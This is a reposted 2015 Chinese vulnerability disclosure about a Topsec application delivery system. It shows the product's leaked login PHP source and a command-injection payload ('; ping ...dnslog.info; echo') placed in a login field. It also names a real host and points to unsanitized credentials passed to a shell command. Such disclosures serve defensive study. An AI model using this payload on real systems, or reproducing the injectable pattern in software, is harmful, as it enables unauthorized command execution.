记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

天融信应用交付系统源码泄漏+用cloudeye神器秒杀命令执行

2015-05-25 02:45

code 区域
http://mail.topsec.com.cn:8888/login.php. 

http://mail.topsec.com.cn:8888/login_check.php.

http://mail.topsec.com.cn:8888/logout.php.

http://mail.topsec.com.cn:8888/redirect.php.



code 区域
<?php

include_once dirname(__FILE__)."/acc/common/uiResources.inc";

require_once dirname(__FILE__)."/acc/common/config/item/configItem.inc";

require_once dirname(__FILE__)."/acc/common/constant.inc";



$error = $_REQUEST['error'];

?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<HTML xmlns="http://www.w3.org/1999/xhtml"><HEAD>

<META http-equiv=Content-Type content="text/html; charset=utf-8">

<TITLE>

<?php echo PRODUCT_NAME_STRING?>

</TITLE>

<meta http-equiv="pragram" content="no-cache">

<meta http-equiv="expires" content="0">

<STYLE type=text/css>

BODY {

MARGIN: 0px;

background-color: #ffffff;



}

input.SmallButtonStyle

{

color: #FFFFFF;

background:#017BC4;

font:bold 14px Arial;

width: 70px;

height:30px;

border-width :3px;

border-style:ridge;

border-color:#CCCCCC;

vertical-align:middle;

text-align:center;

cursor: pointer;

}

.style10 {

font-size: 13px;

color: #FFFFFF;

}



</STYLE>

<LINK href="css/css.css" type=text/css rel=stylesheet>

<META content="MSHTML 6.00.2900.3314" name=GENERATOR>

<script language="javascript" src="js/prototype.js"></script>

<script>

function go(){

new Ajax.Request($('loginForm').action, {

parameters: "userName=" + $F('userName') + "&password=" + $F('pwd'),

onSuccess:function(r){

alert(r.responseText);

var d = r.responseText.evalJSON(true);

var str = $F('err' + d.code);

if(d.code == 0){

if(confirm(d.user + str)){

window.location = 'redirect.php';

}else{

window.location = 'logout.php';

}

}else if(d.code == 1){

alert(str);

}else{

window.location = 'redirect.php';

}

}

});

}

Event.observe(window, 'load', function(){

$('userName').focus();

<?php if(isset($error)){?>

alert($F('err1'));

<?php }?>

});

</script>

<style type="text/css">

<!--

.style11 {color: #017BC4}

-->

</style>

</HEAD>

<BODY>

<span class="style11"></span>

<input type="hidden" id="err0" value="<?php echo LOGIN_INTERRUPT?>"/>

<input type="hidden" id="err1" value="<?php echo LOGIN_ERROR_STRING?>"/>

<input type="hidden" id="err2" value=""/>

<table width="100%" height="90%">

<tr align="center">

<td height="360">

<table width="460" height="275" background="images/login-background.jpg">



<tr>

<td width="44" height="90" align="center">&nbsp;</td>

<td width="181" height="90" align="center"></td>

<td width="219" vAlign="bottom" align="right">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>

</tr>

<tr>

<td height="22" align="center">&nbsp;</td>

<td height="22" align="center">&nbsp;</td>

<TD ><!-- #EndLibraryItem --></TD>

</tr>

<tr>

<td height="38" align="center">&nbsp;</td>

<td height="38" colspan="2" align="center">

<CENTER>

<FORM action="login_check.php" id="loginForm" method=post>

<TABLE border=0>

<TBODY>

<TR align=middle>

<TD width="97" align="right"><strong><?php echo INDEX_USERNAME_STRING ?>:</strong></TD>

<TD width="230"><INPUT style="width:200px;" id=userName size=28 name='userName'></TD>

</TR>

<TR align=middle>

<TD align="right"><strong><?php echo INDEX_PASSWORD_STRING ?>:</strong></TD>

<TD><INPUT style="width:200px; " id="pwd" type=password size=28 name='password'></TD>

</TR>

<TR align=middle>

<TD height="44" colspan="1"></TD>

<TD align="left"><INPUT type='image' src='<?php echo LOGIN_IMAGE ?>' align="top" value="aaaa" ></INPUT></TD>

</TR></TBODY></TABLE>

</FORM></CENTER></td>

</tr>

<tr>

<td height="27" align="center">&nbsp;</td>

<td height="27" align="center">&nbsp;</td>

<td align="center">&nbsp;</td>

</tr>

</table>

</td>

</tr>

</table>

<TABLE cellSpacing=0 cellPadding=0 width=1024 border=0>

<TBODY>

<TR>

<TD align=middle height=46><span class="style10">&copy;</span><FONT

color=white><B>

<?php

echo PAGE_COPYRIGHT_STRING;

?>

&nbsp;

</B></FONT></TD></TR></TBODY></TABLE></BODY></HTML>



code 区域
<?php 

require_once dirname ( __FILE__ ) . '/acc/common/log/LogUtil.inc';



session_start();

/*

$remoteIp = $_SERVER['REMOTE_ADDR'];

file_put_contents("/tmp/loginIp", $remoteIp);

$user = $_SESSION['userInfo'];

syslog(LOG_INFO, "$user login from $remoteIp");

*/

logger('auth', 'User Auth', LOG_ACTION_LOGIN);

header("Location:/");

?>



code 区域
<?php

require_once dirname ( __FILE__ ) . '/acc/common/log/LogUtil.inc';

session_start();

logger('auth', 'User Auth', LOG_ACTION_LOGOUT);

$remote = $_SERVER['REMOTE_ADDR'];// . ':' . $_SERVER['REMOTE_PORT'];

$line = file_get_contents('/tmp/loginIp');



if($remote == $line)

file_put_contents("/tmp/loginIp", '');

$user = $_SESSION['userInfo'];

syslog(LOG_INFO, "$user logout from $remoteIp");

$_SESSION = array();

if (isset($_COOKIE[session_name()])) {

setcookie(session_name(), '', time()-42000, '/');

}

session_destroy();

header("Location:/");

?>



code 区域
<?php

require_once dirname ( __FILE__ ) . "/acc/common/uiResources.inc";

require_once dirname ( __FILE__ ) . "/acc/common/userManager.inc";

require_once dirname ( __FILE__ ) . '/acc/common/commandWrapper.inc';



session_start();

$userManager = new UserManager();

$userName = "";

$password = "";

if(isset($_REQUEST["userName"])){

$userName = $_REQUEST["userName"];

$password = $_REQUEST["password"];

}



if($userManager->certificateUser($userName,$password)){

header("location: redirect.php");

}else{

header("location: login.php?error=1");

}

?>





1.png

2.png





太复杂了,看代码不爽,直接黑盒搞个命令执行看看



code 区域
; ping 333d61.dnslog.info; echo





topsec123.jpg





1.png





漏洞证明:

code 区域
curl 'http://mail.topsec.com.cn:888login_check.php.'

<?php

require_once dirname ( __FILE__ ) . "/acc/common/uiResources.inc";

require_once dirname ( __FILE__ ) . "/acc/common/userManager.inc";

require_once dirname ( __FILE__ ) . '/acc/common/commandWrapper.inc';



session_start();

$userManager = new UserManager();

$userName = "";

$password = "";

if(isset($_REQUEST["userName"])){

$userName = $_REQUEST["userName"];

$password = $_REQUEST["password"];

}



if($userManager->certificateUser($userName,$password)){

header("location: redirect.php");

}else{

header("location: login.php?error=1");

}

?>





code 区域
public function certificateUser($user,$pass){

$logined = false;



//if(strcasecmp($user,"admin")!=0){

// return false;

//}



$validateUserPassFormat= APPEX_CMD_LOC.'ckpwd %s %s';

$command = sprintf($validateUserPassFormat,$user,$pass);

$result = execute($command);

$status = $result->get('retValue');

if($status ==0){

$_SESSION['userInfo']=$user;

$userDao = new UserDao();

$user = $userDao->getUserFromUserName($user);

$_SESSION['userType']=$user->getUserType();

$logined = true;

}

return $logined;

}





修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2015-0105415

阅读:219235 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“天融信应用交付系统源码泄漏+用cloudeye神器秒杀命令执行”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云